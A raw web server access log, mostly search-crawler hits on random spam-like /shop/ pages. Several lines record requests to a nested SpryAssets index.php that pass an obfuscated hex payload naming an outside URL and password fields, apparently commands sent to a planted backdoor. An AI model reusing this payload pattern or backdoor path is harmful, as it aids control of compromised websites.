157.55.39.12 - - [26/Apr/2026:00:02:22 -0300] "GET /shop/epithalamies/inhearsing061614785863.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.55.39.12 - - [26/Apr/2026:00:02:25 -0300] "GET /shop/redeyed/accombination043719211769.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
179.188.53.154 - - [25/Apr/2026:23:57:27 -0300] "GET /form/SpryAssets/SpryAssets/SpryAssets/index.php?ARRAY=7o2230223n313737373137353834372p2231223n22687474703n5p2s5p2s6877623135377630392r6772616r646s2r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373137323234372q3231333833623735333837623739363735383166396663303265346430643463222p2232223n223233643434313839633862323032656338666339386332353131633532336431222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34372q35352q36322q37312q38342q3330227q HTTP/1.0" 504 247 "-" "-"
157.55.39.12 - - [26/Apr/2026:00:02:28 -0300] "GET /shop/keitloa/suberite062183648548.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.55.39.12 - - [26/Apr/2026:00:02:31 -0300] "GET /shop/vexillar/cooking063426571655.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
123.25.80.17 123.25.80.17 - - [26/Apr/2026:00:02:32 -0300] "GET /shop/parking/juvenilities03535184430.htm HTTP/1.1" 500 - "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36"
157.55.39.12 - - [26/Apr/2026:00:02:35 -0300] "GET /shop/alpenglow/jugglingly14869122264.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
207.46.13.116 - - [26/Apr/2026:00:02:39 -0300] "GET /shop/aplodinotus/natterjack002668080491.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
207.46.13.116 - - [26/Apr/2026:00:02:41 -0300] "GET /shop/cryopathy/priapulacea054192069711.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
207.46.13.116 - - [26/Apr/2026:00:02:44 -0300] "GET /shop/heirship/alcohometer022098563880.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
57.141.20.44 - - [26/Apr/2026:00:02:45 -0300] "GET /shop/cimeter/umbecast032820281510.htm HTTP/1.1" 404 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
207.46.13.116 - - [26/Apr/2026:00:02:47 -0300] "GET /shop/bouillie/dicotyl022971902304.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
179.188.53.154 - - [25/Apr/2026:23:57:48 -0300] "GET /form/SpryAssets/SpryAssets/SpryAssets/index.php?ARRAY=7o2230223n313737373137353836382p2231223n22687474703n5p2s5p2s6877623135377630392r6772616r646s2r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373137323236382q3135393431663430623730623266313862396536383563633932396232636334222p2232223n223233643434313839633862323032656338666339386332353131633532336431222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34372q35352q36322q37312q38342q3330227q HTTP/1.0" 504 247 "-" "-"
207.46.13.116 - - [26/Apr/2026:00:02:50 -0300] "GET /shop/sentence/englutting061905327213.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
207.46.13.116 - - [26/Apr/2026:00:02:53 -0300] "GET /shop/demolishment/masticatory002339531370.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
200.58.74.65 - - [26/Apr/2026:00:02:53 -0300] "GET /shop/silenus/xiphodon522135244387.htm HTTP/1.1" 500 - "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36"
207.46.13.116 - - [26/Apr/2026:00:02:56 -0300] "GET /shop/minuting/combustibility103968906886.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.46 - - [26/Apr/2026:00:03:00 -0300] "GET /shop/bander/protectingly09635142112.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.55.39.7 - - [26/Apr/2026:00:03:05 -0300] "GET /shop/bailment/roofing011038415364.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.55.39.7 - - [26/Apr/2026:00:03:06 -0300] "GET /shop/cretaceous/cascalho01183837142.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
179.188.53.154 - - [25/Apr/2026:23:58:09 -0300] "GET /form/SpryAssets/SpryAssets/SpryAssets/index.php?ARRAY=7o2230223n313737373137353838392p2231223n22687474703n5p2s5p2s6877623135377630392r6772616r646s2r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373137323238392q3564666366613636623131396534653637623835353130323739343564373366222p2232223n223233643434313839633862323032656338666339386332353131633532336431222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34372q35352q36322q37312q38342q3330227q HTTP/1.0" 504 247 "-" "-"
40.77.167.46 - - [26/Apr/2026:00:03:10 -0300] "GET /shop/conferential/irrevocably383244386210.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
185.28.218.59 185.28.218.59 - - [26/Apr/2026:00:03:10 -0300] "GET /shop/nilled/prescriber424177418822.htm HTTP/1.1" 500 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
40.77.167.46 - - [26/Apr/2026:00:03:13 -0300] "GET /shop/quadragesimal/thorium09986979883.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.46 - - [26/Apr/2026:00:03:17 -0300] "GET /shop/santee/jactitation012647786535.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.46 - - [26/Apr/2026:00:03:19 -0300] "GET /shop/phenogamian/deckled071049401111.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.46 - - [26/Apr/2026:00:03:22 -0300] "GET /shop/feudalize/confectioner033881084955.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.46 - - [26/Apr/2026:00:03:25 -0300] "GET /shop/sopping/masturbator012502884483.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.46 - - [26/Apr/2026:00:03:28 -0300] "GET /shop/devoid/strata004047546865.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.136 - - [26/Apr/2026:00:03:28 -0300] "GET /shop/judaize/bilineata002657476805.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
179.188.53.154 - - [25/Apr/2026:23:58:30 -0300] "GET /form/SpryAssets/SpryAssets/SpryAssets/index.php?ARRAY=7o2230223n313737373137353931302p2231223n22687474703n5p2s5p2s6877623135377630392r6772616r646s2r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373137323331302q3436343461653061383961633037613764383839643035363765303034626433222p2232223n223233643434313839633862323032656338666339386332353131633532336431222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34372q35352q36322q37312q38342q3330227q HTTP/1.0" 504 247 "-" "-"
40.77.167.46 - - [26/Apr/2026:00:03:31 -0300] "GET /shop/chiton/jawfallen07517127061.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
37.231.218.24 - - [26/Apr/2026:00:03:34 -0300] "GET /shop/outofschool/polysynthesis473082709113.htm HTTP/1.1" 500 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
40.77.167.46 - - [26/Apr/2026:00:03:34 -0300] "GET /shop/listed/rostra031195387583.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.46 - - [26/Apr/2026:00:03:37 -0300] "GET /shop/sentinelled/undermirth053007373666.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.46 - - [26/Apr/2026:00:03:40 -0300] "GET /shop/troutcolored/admeasurement022449315337.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.46 - - [26/Apr/2026:00:03:45 -0300] "GET /shop/yazoo/backwoodsmen43345006105.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.46 - - [26/Apr/2026:00:03:46 -0300] "GET /shop/hoofing/krameric021072190751.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.46 - - [26/Apr/2026:00:03:49 -0300] "GET /shop/arcanum/suppawn06778639637.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
179.188.53.154 - - [25/Apr/2026:23:58:52 -0300] "GET /form/SpryAssets/SpryAssets/SpryAssets/index.php?ARRAY=7o2230223n313737373137353933322p2231223n22687474703n5p2s5p2s6877623135377630392r6772616r646s2r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373137323333322q3131653331636535353239366231326264303262383461656235663066396463222p2232223n223233643434313839633862323032656338666339386332353131633532336431222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34372q35352q36322q37312q38342q3330227q HTTP/1.0" 504 247 "-" "-"
40.77.167.46 - - [26/Apr/2026:00:03:52 -0300] "GET /shop/legislated/unmade433796236269.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
14.180.115.53 14.180.115.53 - - [26/Apr/2026:00:03:52 -0300] "GET /shop/ammocoeles/stinter45332294502.htm HTTP/1.1" 500 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Brave Chrome/86.0.4240.183 Safari/537.36"
40.77.167.46 - - [26/Apr/2026:00:03:55 -0300] "GET /shop/searoving/manticoren067161164.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.46 - - [26/Apr/2026:00:03:57 -0300] "GET /shop/subeditor/democratist013875081148.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.46 - - [26/Apr/2026:00:04:00 -0300] "GET /shop/bandit/cadging033264272721.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
57.141.20.61 - - [26/Apr/2026:00:04:00 -0300] "GET /shop/jemmy/tumblerful05802005076.htm HTTP/1.1" 404 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
40.77.167.46 - - [26/Apr/2026:00:04:03 -0300] "GET /shop/interstition/quirinal022859533090.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
66.249.70.109 - - [26/Apr/2026:00:04:05 -0300] "GET /?621381821?entity=0620541718 HTTP/1.1" 200 235151 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
40.77.167.46 - - [26/Apr/2026:00:04:06 -0300] "GET /shop/formiate/daffadowndilly021187686137.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.46 - - [26/Apr/2026:00:04:09 -0300] "GET /shop/hairdresser/prehension021189981362.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
179.188.53.154 - - [25/Apr/2026:23:59:13 -0300] "GET /form/SpryAssets/SpryAssets/SpryAssets/index.php?ARRAY=7o2230223n313737373137353935332p2231223n22687474703n5p2s5p2s6877623135377630392r6772616r646s2r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373137323335332q3566666661646439366262663332633162363435393035343130666134353535222p2232223n223233643434313839633862323032656338666339386332353131633532336431222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34372q35352q36322q37312q38342q3330227q HTTP/1.0" 504 247 "-" "-"
40.77.167.46 - - [26/Apr/2026:00:04:12 -0300] "GET /shop/cohosh/lounged0698589836.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.46 - - [26/Apr/2026:00:04:16 -0300] "GET /shop/deictic/ecclesiasticus05325473624.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.46 - - [26/Apr/2026:00:04:18 -0300] "GET /shop/collyriums/madderwort032479568424.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.46 - - [26/Apr/2026:00:04:21 -0300] "GET /shop/storial/emblazoned032436090574.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
89.32.140.50 - - [26/Apr/2026:00:04:22 -0300] "GET /shop/gadolinium/quavering491674916757.htm HTTP/1.1" 500 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Brave Chrome/85.0.4183.102 Safari/537.36"
40.77.167.46 - - [26/Apr/2026:00:04:24 -0300] "GET /shop/nautical/nimbuses022312025981.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.46 - - [26/Apr/2026:00:04:28 -0300] "GET /shop/pelma/surplusage413959814816.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.46 - - [26/Apr/2026:00:04:31 -0300] "GET /shop/merulidan/restrainer01118463903.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
14.169.193.108 14.169.193.108 - - [26/Apr/2026:00:04:33 -0300] "GET /catalog/product/fv0bldob1a4enel.html HTTP/1.1" 500 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Brave Chrome/80.0.3987.149 Safari/537.36"
179.188.53.154 - - [25/Apr/2026:23:59:34 -0300] "GET /form/SpryAssets/SpryAssets/SpryAssets/index.php?ARRAY=7o2230223n313737373137353937342p2231223n22687474703n5p2s5p2s6877623135377630392r6772616r646s2r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373137323337342q3665343831626162353137373536626332373134366664333162613262646631222p2232223n223233643434313839633862323032656338666339386332353131633532336431222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34372q35352q36322q37312q38342q3330227q HTTP/1.0" 504 247 "-" "-"
40.77.167.46 - - [26/Apr/2026:00:04:34 -0300] "GET /shop/bestudding/fatheaded431184543501.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.46 - - [26/Apr/2026:00:04:37 -0300] "GET /shop/pitch/hoopskirt021962600156.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
57.141.20.20 - - [26/Apr/2026:00:04:38 -0300] "GET /shop/viverrine/renewedly04297624769.htm HTTP/1.1" 404 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
40.77.167.46 - - [26/Apr/2026:00:04:40 -0300] "GET /shop/bishopsweed/haemo06653152266.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.46 - - [26/Apr/2026:00:04:43 -0300] "GET /shop/nasutness/insubstantial023807494575.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
76.177.48.155 - - [26/Apr/2026:00:04:44 -0300] "GET /2152209723?entity=2149298134 HTTP/1.1" 500 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11.4; rv:135.0) Gecko/20100101 Firefox/135.0"
40.77.167.46 - - [26/Apr/2026:00:04:46 -0300] "GET /shop/deepeyed/glossae042672694470.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.46 - - [26/Apr/2026:00:04:49 -0300] "GET /shop/sixthly/describer052859705216.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.46 - - [26/Apr/2026:00:04:52 -0300] "GET /shop/mesmerize/hypogaeous03921392979.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.55.39.48 - - [26/Apr/2026:00:04:52 -0300] "GET /sitemap-subitem-1808.xml HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
181.218.60.6 - - [26/Apr/2026:00:04:53 -0300] "GET /herd/career/e2bgk0zs0kzluxg.html HTTP/1.1" 500 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36"
40.77.167.46 - - [26/Apr/2026:00:04:55 -0300] "GET /shop/shrubberies/gravitating01789956536.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
179.188.53.154 - - [25/Apr/2026:23:59:56 -0300] "GET /form/SpryAssets/SpryAssets/SpryAssets/index.php?ARRAY=7o2230223n313737373137353939362p2231223n22687474703n5p2s5p2s6877623135377630392r6772616r646s2r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373137323339362q6165393137326666643330336638363066316232373037623035353533336436222p2232223n223233643434313839633862323032656338666339386332353131633532336431222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34372q35352q36322q37312q38342q3330227q HTTP/1.0" 504 247 "-" "-"
40.77.167.46 - - [26/Apr/2026:00:04:58 -0300] "GET /shop/achievance/impersonate051539117486.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.46 - - [26/Apr/2026:00:05:01 -0300] "GET /shop/sopranos/accompliceship052847919588.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.46 - - [26/Apr/2026:00:05:04 -0300] "GET /shop/averred/abator041992465854.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.46 - - [26/Apr/2026:00:05:07 -0300] "GET /shop/demiwolf/protend071124767787.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.46 - - [26/Apr/2026:00:05:10 -0300] "GET /shop/religious/tonometry06907413538.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.46 - - [26/Apr/2026:00:05:13 -0300] "GET /shop/pured/occasional034089229964.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.46 - - [26/Apr/2026:00:05:16 -0300] "GET /shop/effulging/overmodest063712017270.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
38.171.143.163 - - [26/Apr/2026:00:05:16 -0300] "GET /shop/coccobacteria/polyonym012717807585.htm HTTP/1.1" 500 - "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.2 Safari/537.36"
57.141.20.16 - - [26/Apr/2026:00:05:17 -0300] "GET /shop/indicatrix/indued052196770389.htm HTTP/1.1" 404 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
